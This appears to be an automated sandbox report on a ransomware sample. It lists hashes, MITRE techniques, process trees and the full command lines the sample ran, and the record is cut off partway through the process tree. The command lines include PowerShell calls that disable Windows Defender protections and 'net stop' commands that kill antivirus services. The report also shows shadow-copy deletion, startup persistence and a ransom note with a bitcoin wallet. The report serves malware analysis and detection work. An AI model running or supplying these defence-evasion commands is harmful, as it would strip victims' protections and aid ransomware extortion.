81c864ff07c0f51fcf30f2955b3a5d37f0d0923ff9626b215501f8149b089972

Analysis

max time kernel
109s
max time network
143s
platform
windows10_x64
resource
win10v200430
submitted
10-07-2020 08:01

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe
Size

82KB
MD5

e01e11dca5e8b08fc8231b1cb6e2048c
SHA1

4983d07f004436caa3f10b38adacbba6a4ede01a
SHA256

58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f
SHA512

298bfb9fe55ddd80f1c6671622d7e9e865899a855b5bb8e0d85d8520160cedca6fd8bc72c9881925477bcab883bf6e6f4c69f997b774b74fe992e023a81269de

Score

10^/10

ransomware persistence evasion trojan

Malware Config

Signatures

Executes dropped EXE 1 IoCs

Processes:

tu5zwx3r.exe

pid process

5176 tu5zwx3r.exe
Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery
T1018

Processes:

PING.EXE

pid process

5956 PING.EXE

pid	process
5176	tu5zwx3r.exe

pid	process
5956	PING.EXE

Suspicious use of AdjustPrivilegeToken 296 IoCs

Processes:

58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exe

description	pid	process
Token: SeDebugPrivilege	2416	58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe
Token: SeDebugPrivilege	2672	powershell.exe
Token: SeIncreaseQuotaPrivilege	2672	powershell.exe
Token: SeSecurityPrivilege	2672	powershell.exe
Token: SeTakeOwnershipPrivilege	2672	powershell.exe
Token: SeLoadDriverPrivilege	2672	powershell.exe
Token: SeSystemProfilePrivilege	2672	powershell.exe
Token: SeSystemtimePrivilege	2672	powershell.exe
Token: SeProfSingleProcessPrivilege	2672	powershell.exe
Token: SeIncBasePriorityPrivilege	2672	powershell.exe
Token: SeCreatePagefilePrivilege	2672	powershell.exe
Token: SeBackupPrivilege	2672	powershell.exe
Token: SeRestorePrivilege	2672	powershell.exe
Token: SeShutdownPrivilege	2672	powershell.exe
Token: SeDebugPrivilege	2672	powershell.exe
Token: SeSystemEnvironmentPrivilege	2672	powershell.exe
Token: SeRemoteShutdownPrivilege	2672	powershell.exe
Token: SeUndockPrivilege	2672	powershell.exe
Token: SeManageVolumePrivilege	2672	powershell.exe
Token: 33	2672	powershell.exe
Token: 34	2672	powershell.exe
Token: 35	2672	powershell.exe
Token: 36	2672	powershell.exe
Token: SeDebugPrivilege	1640	powershell.exe
Token: SeDebugPrivilege	3912	powershell.exe
Token: SeDebugPrivilege	1464	powershell.exe
Token: SeDebugPrivilege	736	powershell.exe
Token: SeDebugPrivilege	4040	powershell.exe
Token: SeDebugPrivilege	1540	powershell.exe
Token: SeDebugPrivilege	1548	powershell.exe
Token: SeDebugPrivilege	3612	powershell.exe
Token: SeDebugPrivilege	3744	powershell.exe
Token: SeIncreaseQuotaPrivilege	1640	powershell.exe
Token: SeSecurityPrivilege	1640	powershell.exe
Token: SeTakeOwnershipPrivilege	1640	powershell.exe
Token: SeLoadDriverPrivilege	1640	powershell.exe
Token: SeSystemProfilePrivilege	1640	powershell.exe
Token: SeSystemtimePrivilege	1640	powershell.exe
Token: SeProfSingleProcessPrivilege	1640	powershell.exe
Token: SeIncBasePriorityPrivilege	1640	powershell.exe
Token: SeCreatePagefilePrivilege	1640	powershell.exe
Token: SeBackupPrivilege	1640	powershell.exe
Token: SeRestorePrivilege	1640	powershell.exe
Token: SeShutdownPrivilege	1640	powershell.exe
Token: SeDebugPrivilege	1640	powershell.exe
Token: SeSystemEnvironmentPrivilege	1640	powershell.exe
Token: SeRemoteShutdownPrivilege	1640	powershell.exe
Token: SeUndockPrivilege	1640	powershell.exe
Token: SeManageVolumePrivilege	1640	powershell.exe
Token: 33	1640	powershell.exe
Token: 34	1640	powershell.exe
Token: 35	1640	powershell.exe
Token: 36	1640	powershell.exe
Token: SeDebugPrivilege	1616	powershell.exe
Token: SeIncreaseQuotaPrivilege	3912	powershell.exe
Token: SeSecurityPrivilege	3912	powershell.exe
Token: SeTakeOwnershipPrivilege	3912	powershell.exe
Token: SeLoadDriverPrivilege	3912	powershell.exe
Token: SeSystemProfilePrivilege	3912	powershell.exe
Token: SeSystemtimePrivilege	3912	powershell.exe
Token: SeProfSingleProcessPrivilege	3912	powershell.exe
Token: SeIncBasePriorityPrivilege	3912	powershell.exe
Token: SeCreatePagefilePrivilege	3912	powershell.exe
Token: SeBackupPrivilege	3912	powershell.exe

Suspicious use of SendNotifyMessage 3 IoCs

Processes:

58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe

pid	process
2416	58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe
2416	58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe
2416	58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe

Modifies service 2 TTPs 5 IoCs

persistence

Modify Registry

T1112

Modify Existing Service

T1031

Processes:

vssvc.exe

description	ioc	process
Key created	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\SwProvider_{b5946137-7b9f-4925-af80-51abd60b20d5}	vssvc.exe
Key created	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\COM+ REGDB Writer	vssvc.exe
Key created	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\ASR Writer	vssvc.exe
Key created	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Shadow Copy Optimization Writer	vssvc.exe
Key created	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Registry Writer	vssvc.exe

Modifies Windows Defender Real-time Protection settings 3 TTPs 3 IoCs

evasion trojan

Modify Registry

T1112

Modify Existing Service

T1031

Disabling Security Tools

T1089

Processes:

58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe

description	ioc	process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1"	58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1"	58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1"	58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe

Launches sc.exe
Sc.exe is a Windows utlilty to control services on the system.

Interacts with shadow copies 2 TTPs 14 IoCs

Shadow copies are often targeted by ransomware to inhibit system recovery.

ransomware

File Deletion

T1107

Inhibit System Recovery

T1490

Processes:

vssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exe

pid	process
7132	vssadmin.exe
5812	vssadmin.exe
6784	vssadmin.exe
6908	vssadmin.exe
7012	vssadmin.exe
7092	vssadmin.exe
5108	vssadmin.exe
6824	vssadmin.exe
6864	vssadmin.exe
7044	vssadmin.exe
6804	vssadmin.exe
6964	vssadmin.exe
6244	vssadmin.exe
6928	vssadmin.exe

Modifies WinLogon 2 TTPs 2 IoCs

persistence

Winlogon Helper DLL

T1004

Modify Registry

T1112

Processes:

58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe

description	ioc	process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\LegalNoticeCaption = "Information..."	58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\LegalNoticeText = "Your Files are Encrypted.\r\n\r\nDon’t worry, you can return all your files!\r\n\r\nYou've got 48 hours(2 Days), before you lost your files forever.\r\nI will treat you good if you treat me good too.\r\n\r\nThe Price to get all things to the normal : 20,000$\r\nMy BTC Wallet ID :\r\n1F6sq8YvftTfuE4QcYxfK8s5XFUUHC7sD9\r\n\r\nContact :\r\[email protected]\r\n"	58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe

Suspicious use of SetWindowsHookEx 1 IoCs

Processes:

mshta.exe

pid process

5632 mshta.exe
Kills process with taskkill 3 IoCs
evasion

Processes:

taskkill.exetaskkill.exetaskkill.exe

pid process

6648 taskkill.exe
6680 taskkill.exe
6708 taskkill.exe
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
ransomware

File Deletion
T1107

Inhibit System Recovery
T1490

pid	process
5632	mshta.exe

pid	process
6648	taskkill.exe
6680	taskkill.exe
6708	taskkill.exe

Drops startup file 1 IoCs

Processes:

58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe

description	ioc	process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\mystartup.lnk	58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe

Suspicious behavior: EnumeratesProcesses 3138 IoCs

Processes:

58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe

pid	process
2416	58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe
2416	58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe
2416	58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe
2416	58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe
2416	58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe
2416	58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe
2416	58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe
2416	58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe
2416	58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe
2416	58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe
2416	58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe
2416	58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe
2416	58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe
2416	58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe
2416	58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe
2416	58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe
2416	58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe
2416	58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe
2416	58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe
2416	58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe
2416	58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe
2416	58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe
2416	58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe
2416	58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe
2416	58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe
2416	58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe
2416	58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe
2416	58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe
2416	58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe
2416	58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe
2416	58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe
2416	58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe
2416	58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe
2416	58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe
2416	58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe
2416	58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe
2416	58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe
2416	58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe
2416	58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe
2416	58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe
2416	58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe
2416	58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe
2416	58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe
2416	58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe
2416	58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe
2416	58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe
2416	58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe
2416	58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe
2416	58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe
2416	58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe
2416	58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe
2416	58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe
2416	58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe
2416	58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe
2416	58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe
2416	58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe
2416	58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe
2416	58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe
2416	58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe
2416	58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe
2416	58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe
2416	58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe
2416	58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe
2416	58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe

Suspicious use of WriteProcessMemory 233 IoCs

Processes:

58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exenet.exenet.exenet.exenet.exenet.exe

description	pid	process	target process
PID 2416 wrote to memory of 2672	2416	58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe	powershell.exe
PID 2416 wrote to memory of 2672	2416	58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe	powershell.exe
PID 2416 wrote to memory of 1640	2416	58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe	powershell.exe
PID 2416 wrote to memory of 1640	2416	58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe	powershell.exe
PID 2416 wrote to memory of 3912	2416	58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe	powershell.exe
PID 2416 wrote to memory of 3912	2416	58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe	powershell.exe
PID 2416 wrote to memory of 1464	2416	58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe	powershell.exe
PID 2416 wrote to memory of 1464	2416	58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe	powershell.exe
PID 2416 wrote to memory of 736	2416	58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe	powershell.exe
PID 2416 wrote to memory of 736	2416	58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe	powershell.exe
PID 2416 wrote to memory of 4040	2416	58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe	powershell.exe
PID 2416 wrote to memory of 4040	2416	58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe	powershell.exe
PID 2416 wrote to memory of 1540	2416	58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe	powershell.exe
PID 2416 wrote to memory of 1540	2416	58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe	powershell.exe
PID 2416 wrote to memory of 1548	2416	58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe	powershell.exe
PID 2416 wrote to memory of 1548	2416	58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe	powershell.exe
PID 2416 wrote to memory of 3612	2416	58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe	powershell.exe
PID 2416 wrote to memory of 3612	2416	58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe	powershell.exe
PID 2416 wrote to memory of 3744	2416	58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe	powershell.exe
PID 2416 wrote to memory of 3744	2416	58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe	powershell.exe
PID 2416 wrote to memory of 1616	2416	58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe	powershell.exe
PID 2416 wrote to memory of 1616	2416	58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe	powershell.exe
PID 2416 wrote to memory of 4208	2416	58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe	powershell.exe
PID 2416 wrote to memory of 4208	2416	58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe	powershell.exe
PID 2416 wrote to memory of 4332	2416	58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe	powershell.exe
PID 2416 wrote to memory of 4332	2416	58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe	powershell.exe
PID 2416 wrote to memory of 4428	2416	58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe	net.exe
PID 2416 wrote to memory of 4428	2416	58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe	net.exe
PID 2416 wrote to memory of 4448	2416	58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe	net.exe
PID 2416 wrote to memory of 4448	2416	58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe	net.exe
PID 2416 wrote to memory of 4472	2416	58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe	net.exe
PID 2416 wrote to memory of 4472	2416	58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe	net.exe
PID 2416 wrote to memory of 4516	2416	58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe	net.exe
PID 2416 wrote to memory of 4516	2416	58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe	net.exe
PID 2416 wrote to memory of 4560	2416	58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe	net.exe
PID 2416 wrote to memory of 4560	2416	58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe	net.exe
PID 2416 wrote to memory of 4624	2416	58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe	net.exe
PID 2416 wrote to memory of 4624	2416	58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe	net.exe
PID 2416 wrote to memory of 4660	2416	58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe	net.exe
PID 2416 wrote to memory of 4660	2416	58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe	net.exe
PID 2416 wrote to memory of 4696	2416	58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe	net.exe
PID 2416 wrote to memory of 4696	2416	58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe	net.exe
PID 2416 wrote to memory of 4736	2416	58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe	net.exe
PID 2416 wrote to memory of 4736	2416	58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe	net.exe
PID 2416 wrote to memory of 4816	2416	58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe	net.exe
PID 2416 wrote to memory of 4816	2416	58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe	net.exe
PID 2416 wrote to memory of 4856	2416	58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe	net.exe
PID 2416 wrote to memory of 4856	2416	58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe	net.exe
PID 4428 wrote to memory of 4876	4428	net.exe	net1.exe
PID 4428 wrote to memory of 4876	4428	net.exe	net1.exe
PID 2416 wrote to memory of 4924	2416	58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe	net.exe
PID 2416 wrote to memory of 4924	2416	58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe	net.exe
PID 4448 wrote to memory of 4964	4448	net.exe	net1.exe
PID 4448 wrote to memory of 4964	4448	net.exe	net1.exe
PID 2416 wrote to memory of 4996	2416	58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe	net.exe
PID 2416 wrote to memory of 4996	2416	58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe	net.exe
PID 4472 wrote to memory of 5016	4472	net.exe	net1.exe
PID 4472 wrote to memory of 5016	4472	net.exe	net1.exe
PID 4516 wrote to memory of 5044	4516	net.exe	net1.exe
PID 4516 wrote to memory of 5044	4516	net.exe	net1.exe
PID 2416 wrote to memory of 5056	2416	58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe	net.exe
PID 2416 wrote to memory of 5056	2416	58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe	net.exe
PID 4560 wrote to memory of 5108	4560	net.exe	net1.exe
PID 4560 wrote to memory of 5108	4560	net.exe	net1.exe

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

Processes:

mshta.exe

pid process

5632 mshta.exe
Runs net.exe

pid	process
5632	mshta.exe

Suspicious use of FindShellTrayWindow 3 IoCs

Processes:

58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe

pid	process
2416	58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe
2416	58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe
2416	58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe

Blacklisted process makes network request 3 IoCs

Processes:

mshta.exe

flow pid process

45 5632 mshta.exe
47 5632 mshta.exe
49 5632 mshta.exe

flow	pid	process
45	5632	mshta.exe
47	5632	mshta.exe
49	5632	mshta.exe

C:\Users\Admin\AppData\Local\Temp\58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe
"C:\Users\Admin\AppData\Local\Temp\58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe"
1⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SendNotifyMessage
- Modifies Windows Defender Real-time Protection settings
- Modifies WinLogon
- Drops startup file
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
- Suspicious use of FindShellTrayWindow
PID:2416

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" Get-MpPreference -verbose
2⤵
- Suspicious use of AdjustPrivilegeToken
PID:2672

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableArchiveScanning $true
2⤵
- Suspicious use of AdjustPrivilegeToken
PID:1640

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableBlockAtFirstSeen $true
2⤵
- Suspicious use of AdjustPrivilegeToken
PID:3912

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableIOAVProtection $true
2⤵
- Suspicious use of AdjustPrivilegeToken
PID:1464

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisablePrivacyMode $true
2⤵
- Suspicious use of AdjustPrivilegeToken
PID:736

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableScriptScanning $true
2⤵
- Suspicious use of AdjustPrivilegeToken
PID:4040

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -HighThreatDefaultAction 6 -Force
2⤵
- Suspicious use of AdjustPrivilegeToken
PID:1540

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -LowThreatDefaultAction 6
2⤵
- Suspicious use of AdjustPrivilegeToken
PID:1548

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -MAPSReporting 0
2⤵
- Suspicious use of AdjustPrivilegeToken
PID:3612

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -ModerateThreatDefaultAction 6
2⤵
- Suspicious use of AdjustPrivilegeToken
PID:3744

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -SevereThreatDefaultAction 6
2⤵
- Suspicious use of AdjustPrivilegeToken
PID:1616

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -SignatureDisableUpdateOnStartupWithoutEngine $true
2⤵
PID:4208

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -SubmitSamplesConsent 2
2⤵
PID:4332

C:\Windows\SYSTEM32\net.exe
"net.exe" stop avpsus /y
2⤵
- Suspicious use of WriteProcessMemory
PID:4428

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop avpsus /y
3⤵
PID:4876

C:\Windows\SYSTEM32\net.exe
"net.exe" stop McAfeeDLPAgentService /y
2⤵
- Suspicious use of WriteProcessMemory
PID:4448

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop McAfeeDLPAgentService /y
3⤵
PID:4964

C:\Windows\SYSTEM32\net.exe
"net.exe" stop mfewc /y
2⤵
- Suspicious use of WriteProcessMemory
PID:4472

